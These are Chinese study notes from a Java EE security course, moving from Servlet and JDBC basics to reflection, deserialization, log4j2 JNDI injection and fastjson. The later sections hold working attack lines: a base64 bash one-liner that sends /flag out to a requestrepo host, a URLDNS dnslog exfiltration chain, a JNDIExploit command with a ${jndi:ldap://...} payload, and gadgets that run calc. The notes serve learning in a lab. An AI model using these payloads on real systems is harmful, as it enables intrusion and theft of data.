4. 小迪安全v2023筆記 javaEE應用
? 大體上跟隨小迪安全的課程,本意是記錄自己的學習歷程,不能說是完全原創吧,大家可以關注一下小迪安全。
若有冒犯,麻煩私信移除。
默認有java基礎。
文章目錄
- 4. 小迪安全v2023筆記 javaEE應用
- 0. 一些概念
- 1. javaEE環境配置
- 2. Servlet路由,get與post
- 3. JDBC mybatis hibernate
- 1. JDBC配置與使用
- 2. Filter過濾器
- 3. Listener監聽器
- 4. java反射
- 1. Java反射-Class對象類的獲取
- 2. 利用反射獲取成員變量
- 3. 不安全命令執行
- 5. java反序列化初識
- 1. 重寫readObject方法
- 2. URLDNS鏈
- 6. DNSlog
- 7. 一些第三方組件
- 1. maven與log4j配置
- 2. log4j2遠程代碼執行
- 3. fastjson
- 參考文章
0. 一些概念
Servlet是運行在Web服務器上的程序,它作為來自Web瀏覽器或其他http客戶端的請求和http服務器上的數據庫或應用程序之間的中間層。使用servlet可以收集來自網頁表單的用戶輸入,呈現來自數據庫或者其他源的記錄,還可以動態創建網頁。
tomcat是免費開源的輕量級服務器。當配置正確時,Apache 為HTML頁面服務,而Tomcat 實際上運行JSP 頁面和Servlet。
1. javaEE環境配置
下載安裝配置好以下軟件
jdk7 (jdk-17后面的復現不了)
mysql 8.0
navicat
tomcat 8.5
- 記得去conf的server.xml里把8080端口改成9528
- 去conf的logging.properties里修改
java.util.logging.ConsoleHandler.encoding = GBK - 系統環境變量
CATALINA_HOME設置為自己tomcat路徑,系統環境變量Path里添加%CATALINA_HOME%\bin。 - 在cmd里輸入
startup.bat,然后訪問127.0.0.1:9528。
eclipse IDE for Enterprise Java and Web Developers
Eclipse開發JavaEE環境搭建 IT曉夏
web.xml 配置映射關系
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1"><display-name>javaee1</display-name><welcome-file-list><welcome-file>index.html</welcome-file><welcome-file>index.jsp</welcome-file><welcome-file>index.htm</welcome-file><welcome-file>default.html</welcome-file><welcome-file>default.jsp</welcome-file><welcome-file>default.htm</welcome-file></welcome-file-list><servlet><servlet-name>test1</servlet-name><servlet-class>com.example.demo1.test1</servlet-class></servlet><servlet-mapping><servlet-name>test1</servlet-name><url-pattern>/test</url-pattern></servlet-mapping>
</web-app>
src/main/java/com/example/demo1/test1.java
package com.example.demo1;
import javax.servlet.http.*;import java.io.IOException;import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;@WebServlet(name="test1",value="/test")
public class test1 extends HttpServlet{@Overrideprotected void doGet(HttpServletRequest req,HttpServletResponse resp)throws ServletException,IOException{//super.doGet(req, resp);System.out.println("hello world");}
}
2. Servlet路由,get與post
生命周期
實例化->初始化->服務->消亡
src/main/java/com/example/demo1/test1.java
package com.example.demo1; import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter; @WebServlet(name = "test1", urlPatterns = {"/test"})
public class test1 extends HttpServlet { @Overridepublic void init(ServletConfig config) throws ServletException {// TODO Auto-generated method stubsuper.init(config);System.out.println("init");}@Override protected void service(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {// TODO Auto-generated method stubsuper.service(req, resp);System.out.println("Http servlet");}@Overridepublic void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {// TODO Auto-generated method stubsuper.service(req, res);System.out.println("servlet service");}@Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { //System.out.println("hello world");req.setCharacterEncoding("utf-8");String name = req.getParameter("name"); resp.setContentType("text/html;charset=UTF-8");PrintWriter out = resp.getWriter(); if (name != null) { out.println("name: " + name); } else { out.println("No name parameter found."); } }@Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { req.setCharacterEncoding("utf-8");String name = req.getParameter("name"); System.out.print(name);resp.setContentType("text/html;charset=UTF-8");PrintWriter out = resp.getWriter(); if (name != null) { out.println("name: " + name); }}@Overridepublic void destroy() {// TODO Auto-generated method stubsuper.destroy();System.out.println("destroy");}
}
訪問http://127.0.0.1:9528/javaee1/test
3. JDBC mybatis hibernate
? JDBC是Java用于數據庫訪問的基礎API,MyBatis是一個持久層框架,它封裝了JDBC并提供靈活的SQL映射功能,使開發者能更方便地操作數據庫;而Hibernate則是一個完整的ORM框架,它允許開發者以面向對象的方式操作數據庫,自動生成和執行SQL語句,提高了開發效率。
1. JDBC配置與使用
1.訪問https://mvnrepository.com,下載數據庫驅動mysql-connector-java.jar
2.將jar拖進WEB-INF的lib目錄下。
3.在Eclipse中,右鍵點擊webapp,選擇 Build Path -> Configure Build Path...。
4.選擇Libraries選項,點擊add External jars,添加jar。
MysqlServlet.java 普通sql語句
package com.example.demo1;
import java.sql.*;
public class MysqlServlet {//8.0以下//static final String JDBC_DRIVER="com.mysql.jdbc.Driver";//static final String DB_URL="jdbc:mysql://localhost:3306/user";//mysql8.0以上static final String JDBC_DRIVER="com.mysql.cj.jdbc.Driver";static final String DB_URL="jdbc:mysql://localhost:3306/user?useSSL=false&serverTimezone=UTC";//用戶名,密碼static final String USER ="root";static final String PASS ="123456";public static void main(String[] args) {Connection conn=null;Statement stmt=null;ResultSet rs=null;try {// 加載并注冊JDBC驅動類Class.forName(JDBC_DRIVER);// 建立數據庫連接conn = DriverManager.getConnection(DB_URL, USER, PASS);// 操作數據庫...stmt=conn.createStatement();String sql = "SELECT * FROM t_user"; rs = stmt.executeQuery(sql); // 處理查詢結果,一次一行 while (rs.next()) { System.out.println("rs: " + rs.getInt("id")+" "+rs.getString("username")+" "+rs.getString("password")); }// 關閉連接conn.close();} catch (ClassNotFoundException e) {System.out.println("MySQL JDBC 驅動未找到");e.printStackTrace();} catch (SQLException e) {System.out.println("數據庫連接失敗");e.printStackTrace();}}
}
預編譯寫法防sql注入
public static void main(String[] args) {Connection conn=null;PreparedStatement pstmt = null;ResultSet rs=null;try {// 加載并注冊JDBC驅動類Class.forName(JDBC_DRIVER);// 建立數據庫連接conn = DriverManager.getConnection(DB_URL, USER, PASS);// 查詢語句String sql = "SELECT * FROM t_user where id>? and username!=?"; pstmt=conn.prepareStatement(sql);//參數一表示占位符位數(從1開始)pstmt.setInt(1, 1);pstmt.setString(2, "admin");rs = pstmt.executeQuery(); // 處理查詢結果 while (rs.next()) { System.out.println("rs: " + rs.getInt("id")+" "+rs.getString("username")+" "+rs.getString("password")); }// 關閉連接conn.close();} catch (ClassNotFoundException e) {System.out.println("MySQL JDBC 驅動未找到");e.printStackTrace();} catch (SQLException e) {System.out.println("數據庫連接失敗");e.printStackTrace();}}
2. Filter過濾器
XssFilter.java
package com.example.demo1.filter;
import java.io.IOException;import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;@WebFilter("/test2")
public class XssFilter implements Filter{@Overridepublic void init(FilterConfig filterConfig) throws ServletException {//中間件啟動后就自動運行System.out.println("xss過濾開啟");}@Overridepublic void destroy() {//中間件關閉后就自動運行System.out.println("xss銷毀過濾");}@Overridepublic void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)throws IOException, ServletException {System.out.println("xss正在過濾");HttpServletRequest request2=(HttpServletRequest) request;String name=request2.getParameter("name");if(name!=null && name.contains("<script>")) {System.out.print("存在xss攻擊");}else {chain.doFilter(request,response);//放行}}}
test2.java
package com.example.demo1;
import java.io.IOException;
import java.io.PrintWriter;import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;@WebServlet(name = "test2", urlPatterns = {"/test2"})
public class test2 extends test1 { @Overridepublic void init(ServletConfig config) throws ServletException {//自動調用super.init(config);System.out.println("test2 init");}@Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { //System.out.println("hello world");req.setCharacterEncoding("utf-8");String name = req.getParameter("name"); resp.setContentType("text/html;charset=UTF-8");PrintWriter out = resp.getWriter(); if (name != null) { out.println("name: " + name); } else { out.println("No name parameter found."); } out.flush();out.close();}@Override public void destroy() {//當 Servlet 被 Web 服務器移除出服務或者關閉時,自動調用super.destroy();System.out.println("test2 destroy");}
}
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1"><display-name>javaee1</display-name><welcome-file-list><welcome-file>index.html</welcome-file><welcome-file>index.jsp</welcome-file><welcome-file>index.htm</welcome-file><welcome-file>default.html</welcome-file><welcome-file>default.jsp</welcome-file><welcome-file>default.htm</welcome-file></welcome-file-list><servlet><servlet-name>test1</servlet-name><servlet-class>com.example.demo1.test1</servlet-class></servlet><servlet-mapping><servlet-name>test1</servlet-name><url-pattern>/test</url-pattern></servlet-mapping><servlet><servlet-name>test2</servlet-name><servlet-class>com.example.demo1.test2</servlet-class></servlet><servlet-mapping><servlet-name>test2</servlet-name><url-pattern>/test2</url-pattern></servlet-mapping><filter><filter-name>XssFilter</filter-name><filter-class>com.example.demo1.filter.XssFilter</filter-class></filter><filter-mapping><filter-name>XssFilter</filter-name><url-pattern>/test2</url-pattern></filter-mapping>
</web-app>
獲取cookie
Cookie[] cookies=request2.getCookies();
for(Cookie c :cookies) {//遍歷cookies數組String cname=c.getName();String cvalue=c.getValue();System.out.println(cname+cvalue);
}
3. Listener監聽器
ListenSession.java
package com.example.demo1.Listener;import javax.servlet.annotation.WebListener;
import javax.servlet.http.HttpSessionEvent;
import javax.servlet.http.HttpSessionListener;
//listener不用加url路由
@WebListener
public class ListenSession implements HttpSessionListener{@Overridepublic void sessionCreated(HttpSessionEvent se) {System.out.println("監聽器監聽到了創建");}@Overridepublic void sessionDestroyed(HttpSessionEvent se) {System.out.println("監聽器監聽到了銷毀");}}
DSession.java
package com.example.demo1;import java.io.IOException;import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;@WebServlet(name = "ds", urlPatterns = {"/ds"})
public class DSession extends HttpServlet {@Overrideprotected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {// TODO Auto-generated method stubSystem.out.println("session銷毀");req.getSession().invalidate();}
}
CSession.java
package com.example.demo1;import java.io.IOException;import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;@WebServlet(name = "cs", urlPatterns = {"/cs"})
public class CSession extends HttpServlet{@Overrideprotected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {System.out.println("創建Session");req.getSession();//創建session}
}
web.xml添加
<servlet><servlet-name>cs</servlet-name><servlet-class>com.example.demo1.CSession</servlet-class></servlet><servlet-mapping><servlet-name>cs</servlet-name><url-pattern>/cs</url-pattern></servlet-mapping> <servlet><servlet-name>ds</servlet-name><servlet-class>com.example.demo1.DSession</servlet-class></servlet><servlet-mapping><servlet-name>ds</servlet-name><url-pattern>/ds</url-pattern></servlet-mapping>
4. java反射
如果項目環境壞了,建議刪掉項目,重建一個。
? 反射是Java的特征之一,是一種間接操作目標對象的機制,核心是JVM在運行狀態的時候才動態加載類,對于任意一個類都能夠知道這個類所有的屬性和方法,并且對于任意一個對象,都能夠調用它的方法/訪問屬性。這種動態獲取信息以及動態調用對象方法的功能成為Java語言的反射機制。通過使用反射我們不僅可以獲取到任何類的成員方法(Methods)、成員變量(Fields)、構造方法(Constructors)等信息,還可以動態創建Java類實例、調用任意的類方法、修改任意的類成員變量值等。
1. Java反射-Class對象類的獲取
//1.根據類名:類名.class
Class userClass =User.class;
//2.根據對象:對象.getClass()
User user=new User();
Class ac=user.getClass();
//3.根據全限定類名:Class.forname("全路徑名")
Class ac=Class.forName("com.example.demo1.User");
//4.通過類加載器獲取Class對象:
//ClassLoader.getSystemClassLoader().loadClass("com.example.demo1.User");
ClassLoader clsload=ClassLoader.getSystemClassLoader();
Class ac2=clsload.loadClass("com.example.demo1.User");
要注意的一點,需要把package復制到lib目錄下,然后project->clean,build automatically,不然forname函數找不到路徑。
User.java
package com.example.demo1;
public class User {public String name="lihua";public int age=15;public User() {// TODO Auto-generated constructor stub}public User(String n,int a) {// TODO Auto-generated constructor stubthis.name=n;this.age=a;}
}
GetClass.java
package com.example.demo1;
import java.lang.Class;
public class GetClass {public static void main(String[] args) {System.out.println(666);try{ClassLoader clsload=ClassLoader.getSystemClassLoader();Class ac2=clsload.loadClass("com.example.demo1.User");System.out.print(ac2);}catch(Exception e){System.out.print(e);}}
}
2. 利用反射獲取成員變量
//Class類中用于獲取成員變量的方法
Field[] getFields()://返回所有 公共 成員變量對象的數組
Field[] getDeclaredFields()://返回所有成員變量對象的數組
Field getField(String name)://返回單個公共成員變量對象
Field getDeclaredField(String name)://返回單個成員變量對象//Field 類中用于創建對象的方法
void set(Object obj,Object value):賦值
Object get(Object obj)獲取值。//Class類中用于獲取構造方法的方法
Constructor<?>[] getConstructors(): 返回所有公共構造方法對象的數組
Constructor<?>[] getDeclaredConstructors(): 返回所有構造方法對象的數組
Constructor<T>[] getConstructor(Class<?>... parameterTypes): 返回單個公共構造方法對象
Constructor<T>[] getDeclaredConstructor(Class<?>... parameterTypes)://返回單個構造方法對象//Constructor類中用于創建對象的方法
T newInstance(Object... initargs): 根據指定的構造方法創建對象
setAccessible(boolean flag): 設置為true,表示取消訪問檢查//Class類中用于獲取成員方法的方法
Method[] getMethods():返回所有公共成員方法對象的數組,包括繼承的
Method[] getDeclaredMethods():返回所有成員方法對象的數組,不包括繼承的
Method getMethod(String name, Class<?>... parameterTypes) :返回單個公共成員方法對象
Method getDeclaredMethod(String name, Class<?>... parameterTypes):返回單個成員方法對象//Method類中用于創建對象的方法
Object invoke(Object obj, Object... args):
運行方法
參數一:用obj對象調用該方法
參數二:調用方法的傳遞的參數(如果沒有就不寫)
返回值:方法的返回值(如果沒有就不寫)
GetClass.java修改對應部分
User u=new User();Class ac2=Class.forName("com.example.demo1.User");Field field=ac2.getField("age");Object a=field.get(u);System.out.println(a);//15field.set(u, 44);System.out.print(field.get(u));//44Constructor c1=ac2.getDeclaredConstructor(String.class);//獲取構造方法System.out.println(c1);//public com.example.demo1.User(java.lang.String,int)//臨時開啟對私有的訪問c1.setAccessible(true);User uu=(User)c1.newInstance("lisi");System.out.println(uu.name);//lisiUser u2=new User();Method m1=ac2.getDeclaredMethod("ptall",String.class,int.class);m1.invoke(u2,"zzz",66);//zzz 66
User.java 添加類方法
private User(String n) {this.name=n;}public void ptall(String n,int a) {System.out.println(n+" "+a);}
3. 不安全命令執行
原型:
Runtime.*getRuntime*().exec("calc");
該函數不會解析Shell命令或Shell特性(如管道|、重定向>、反引號等)。
可以顯示調用bash -c執行子查詢
curl http://`cat /flag`.i5yh54u0.requestrepo.cojava.lang.Runtime.getRuntime().exec('bash -c {echo,Y3VybCAgaHR0cDovL2BjYXQgL2ZsYWdgLmk1eWg1NHUwLnJlcXVlc3RyZXBvLmNvbS8=}|{base64,-d}|{bash,-i}')
反射:
Class ac1=Class.forName("java.lang.Runtime");
Method exec1=ac1.getMethod("exec", String.class);
Method getRuntime1=ac1.getMethod("getRuntime");
Object runtimeObject=getRuntime1.invoke(ac1);
exec1.invoke(runtimeObject, "calc.exe");
5. java反序列化初識
序列化:將內存中的對象壓縮成字節流。
反序列化:將字節流轉化成內存中的對象。
幾種創建的序列化和反序列化協議
- Java內置的writeObject()/readObject()
- Java內置的XMLDecoder()/XMLEncoder()
- Xstream
- SnakeYaml
- FastJson
- Jackson
類實現序列化需滿足的條件
- 實現java.io.Serializeble接口
- 該類所有屬性必須可序列化
- 如果有一個屬性不可序列化,那么這個屬性必須注明是短暫的
為什么出現反序列化安全問題
內置原生寫法
- 重寫readObject方法
- 輸出調用toString方法
1. 重寫readObject方法
User.java
package com.example.demo1;import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;public class User implements Serializable{public String name="lihua";public int age=15;public User() {}public User(String n,int a) {this.name=n;this.age=a;}public String toString() {return "User{"+"name= "+name+" , age= "+age+" }";}public void ptall() {System.out.println(name+" "+age);}private void readObject(ObjectInputStream ois)throws IOException,ClassNotFoundException{//指向正確的defaultReadObjectois.defaultReadObject();Runtime.getRuntime().exec("calc");}
}
serializedemo1.java
package com.example.demo1;
import java.io.*;
public class serializedemo1 {public static void main(String[] args)throws IOException {User u =new User("serialize2",63);// 調用方法將User對象序列化并保存到文件 SerializableTest(u);}public static void SerializableTest(Object obj) throws IOException {//將對象obj進行序列化后輸出到1.txtObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("1.txt"));oos.writeObject(obj); }
}
Unserializedemo1.java
package com.example.demo1;import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;public class unserializedemo1 {public static void main(String[] args)throws IOException,ClassNotFoundException {//調用下面方法將1.txt反序列化成類對象System.out.println(UnserializableTest("1.txt"));}public static Object UnserializableTest(String filename) throws IOException,ClassNotFoundException {//讀取File文件內容進行反序列化ObjectInputStream objectInputStream=new ObjectInputStream(new FileInputStream(filename));Object o=objectInputStream.readObject();return o;}
}
代碼執行,成功彈出計算器。
2. URLDNS鏈
HashMap.readObject()->HashMap.putVal()->HashMap.hash()->URL.hashCode()
hashCode執行結果觸發dns請求,如果是執行命令的話就是RCE漏洞。
urldns.java
package com.example.demo1;
import java.util.HashMap;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.net.URL;
public class urldns implements Serializable{public static void main(String[] args) throws IOException,ClassNotFoundException{HashMap<URL, Integer> hash=new HashMap<>();URL url =new URL("http://whoami.v0taa6.dnslog.cn");//寫dnslog.cn給的網址,并把whoami以子域名的形式外帶hash.put(url, 1);SerializableTest(hash);UnserializableTest("dns.txt");}public static void SerializableTest(Object obj) throws IOException {//將對象obj進行序列化后輸出到dns.txtObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("dns.txt"));oos.writeObject(obj); }public static Object UnserializableTest(String filename) throws IOException,ClassNotFoundException {//讀取File文件內容進行反序列化ObjectInputStream objectInputStream=new ObjectInputStream(new FileInputStream(filename));Object o=objectInputStream.readObject();return o;}
}
攻擊腳本ysoserial.jar
6. DNSlog
dnslog.cn
? DNSLog的原理是利用DNS協議的特性,將需要收集的信息編碼成DNS查詢請求,然后將請求發送到DNS服務器,最后通過DNS服務器的響應來獲取信息。
DNS解析流程
比如SQL注入時,網站響應無回顯,可以以dnslog子域名的方式外帶SQL結果。
7. 一些第三方組件
Maven能夠自動下載項目所需的所有依賴項,并且管理這些依賴的版本,確保項目的構建一致性。
log4j是一個流行的Java日志框架,用于記錄應用程序的運行時信息。
1. maven與log4j配置
Maven工程的安裝配置及搭建 ChatYU
下載安裝apache-maven-3.8.8
添加環境變量MAVEN_HOME,值為apache-maven-3.8.8的路徑。
環境變量path添加%MAVEN_HOME%\bin
在apache-maven-3.8.8-bin目錄下新建mvn_repository目錄。
在apache-maven-3.8.8\conf\settings.xml里修改對應的值,如下。
<localRepository>你的路徑/apache-maven-3.8.8-bin/mvn_repository</localRepository>
再修改生效的mirrors標簽同下(換源):
<mirrors><mirror><id>alimaven</id><name>aliyun maven</name><url>http://maven.aliyun.com/nexus/content/groups/public/</url><mirrorOf>central</mirrorOf> </mirror><mirror> <id>alimaven</id> <mirrorOf>central</mirrorOf> <name>aliyun maven</name> <url>http://maven.aliyun.com/nexus/content/repositories/central/</url> </mirror> </mirrors>
eclipse點擊windows->preferences->maven->installations->add。添加完后勾選mvn_repository。
新建maven project,要注意選internal和webapp。
進程卡在33%左右時,需要在console輸入Y。
進入mvnrepository.com,搜索apache log4j core(2.14.1版本)和java servlet api (3.1.0)。
將使用maven的依賴添加到maven的pom.xml中,然后run as maven test,下載依賴。
pom.xml參考如下
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"><modelVersion>4.0.0</modelVersion><groupId>mavenexample1.com</groupId><artifactId>maven1</artifactId><packaging>war</packaging><version>0.0.1-SNAPSHOT</version><name>maven1 Maven Webapp</name><url>http://maven.apache.org</url><dependencies><dependency><groupId>junit</groupId><artifactId>junit</artifactId><version>3.8.1</version><scope>test</scope></dependency><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-core</artifactId><version>2.14.1</version></dependency><!-- https://mvnrepository.com/artifact/javax.servlet/javax.servlet-api --><dependency><groupId>javax.servlet</groupId><artifactId>javax.servlet-api</artifactId><version>3.1.0</version><scope>provided</scope></dependency></dependencies><build><finalName>maven1</finalName></build>
</project>
java Resources/src/main/java下新建package com.example.demo2,在package里新建log4jTest.java。
log4jTest.java
package com.example.demo2;import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;import java.io.IOException;
import java.io.PrintWriter;import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;@WebServlet(name="log4j",urlPatterns = {"/log4j"})
public class log4jTest extends HttpServlet{private static final Logger logger=LogManager.getLogger(log4jTest.class);@Overridepublic void init(ServletConfig config) throws ServletException {// TODO Auto-generated method stubsuper.init(config);System.out.println("init");String codeString="${java:os}";logger.error("{}",codeString);}@Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { //System.out.println("hello world");req.setCharacterEncoding("utf-8");String name = req.getParameter("name"); resp.setContentType("text/html;charset=UTF-8");PrintWriter out = resp.getWriter(); if (name != null) { out.println("name: " + name); } else { out.println("No name parameter found."); } }
}
web.xml參考如下
<!DOCTYPE web-app PUBLIC"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN""http://java.sun.com/dtd/web-app_2_3.dtd" ><web-app><display-name>maven1</display-name><servlet><servlet-name>log4j</servlet-name><servlet-class>com.example.demo2.log4jTest</servlet-class></servlet><servlet-mapping><servlet-name>log4j</servlet-name><url-pattern>/log4j</url-pattern></servlet-mapping></web-app>
然后把package復制到lib目錄下,然后project->clean,build automatically。(讓項目能找到你的代碼路徑)
然后把在中間servers->tomcat v8.5添加maven1,并運行。
查看運行結果
2. log4j2遠程代碼執行
? Java 命名和目錄接口 (JNDI) 是一種 Java API,它允許 Java 軟件客戶端通過名稱發現和查找數據和對象。JNDI 提供了一個通用接口,用于訪問不同的命名和目錄服務,例如 LDAP、DNS 和 NIS 提供的服務。JNDI 可用于訪問 Java EE 應用程序中的數據庫、隊列和 EJB(Enterprise JavaBeans)等資源,也可用于通過 RMI(遠程方法調用)或 CORBA(通用對象請求代理架構)訪問遠程對象)。
高版本jdk利用
https://www.cnblogs.com/EddieMurphy-blogs/p/18078943
https://www.cnblogs.com/uf9n1x/p/17343393.html
低版本jdk利用
自行下載JNDIExploit-SNAPSHOT.jar。https://www.cnblogs.com/Welk1n/p/11701401.html
攻擊機 kali linux
java -jar ./JNDI* -C "calc" -A 192.168.10.4
靶機,需要控制eclipse編譯時的jdk版本
@WebServlet(name="log4j",urlPatterns = {"/log4j"})
public class log4jTest extends HttpServlet{private static final Logger logger=LogManager.getLogger(log4jTest.class);@Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { //System.out.println("hello world");String code= req.getParameter("code"); PrintWriter out = resp.getWriter(); if (code != null) { out.println("code exists" ); logger.error("{}",code);} else { out.println("No code parameter found."); } }
}
訪問網頁時傳參?code=${jndi:ldap://192.168.10.4:1039/fgf4fp}
各位自行嘗試。
3. fastjson
mvn repository 搜索fastjson1 compatible(1.2.24),然后maven代碼放進pom.xml,maven test。
fastjsondemo1.java
package com.example.demo2;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;class fastjsondemo1{public static void main(String[] args) {//u Object 對象User u=new User();//使用fastjson的函數來把對象轉為json數據String j1=JSONObject.toJSONString(u);System.out.println(j1);//{"age":15,"name":"lihua"}String j2=JSONObject.toJSONString(u,SerializerFeature.WriteClassName);System.out.println(j2);//{"@type":"com.example.demo2.User","age":15,"name":"lihua"}//json->對象String test="{\"@type\":\"com.example.demo2.User\",\"age\":15,\"name\":\"lihua\"}";JSONObject jsonObject1=JSON.parseObject(test);System.out.println(jsonObject1);//{"name":"lihua","age":15}//若修改@type的值String test1="{\"@type\":\"com.example.demo2.Run1\",\"age\":15,\"name\":\"lihua\"}";JSONObject jsonObject2=JSON.parseObject(test1);System.out.println(jsonObject2);//跳計算器}
}
Run1.java
package com.example.demo2;
import java.io.IOException;
public class Run1 {public Run1( )throws IOException {// TODO Auto-generated constructor stubRuntime.getRuntime().exec("calc");}}
參考文章
-
JAVA安全基礎(二)-- 反射機制 小陽
-
JAVA反序列化初食 將遺憾寫成歌
-
DNSLog漏洞探測(一)之DNSLog介紹 怰月
-
JNDI注入學習 FlynnAAAA
-
JNDI&RMI&LDAP介紹+log4j分析 enhengzZ
-
Java反序列化:CC1鏈 詳解 Jay 17
)
)
、鍵(k_proj)和值(v_proj)投影具體含義)
—— Linux常用命令)
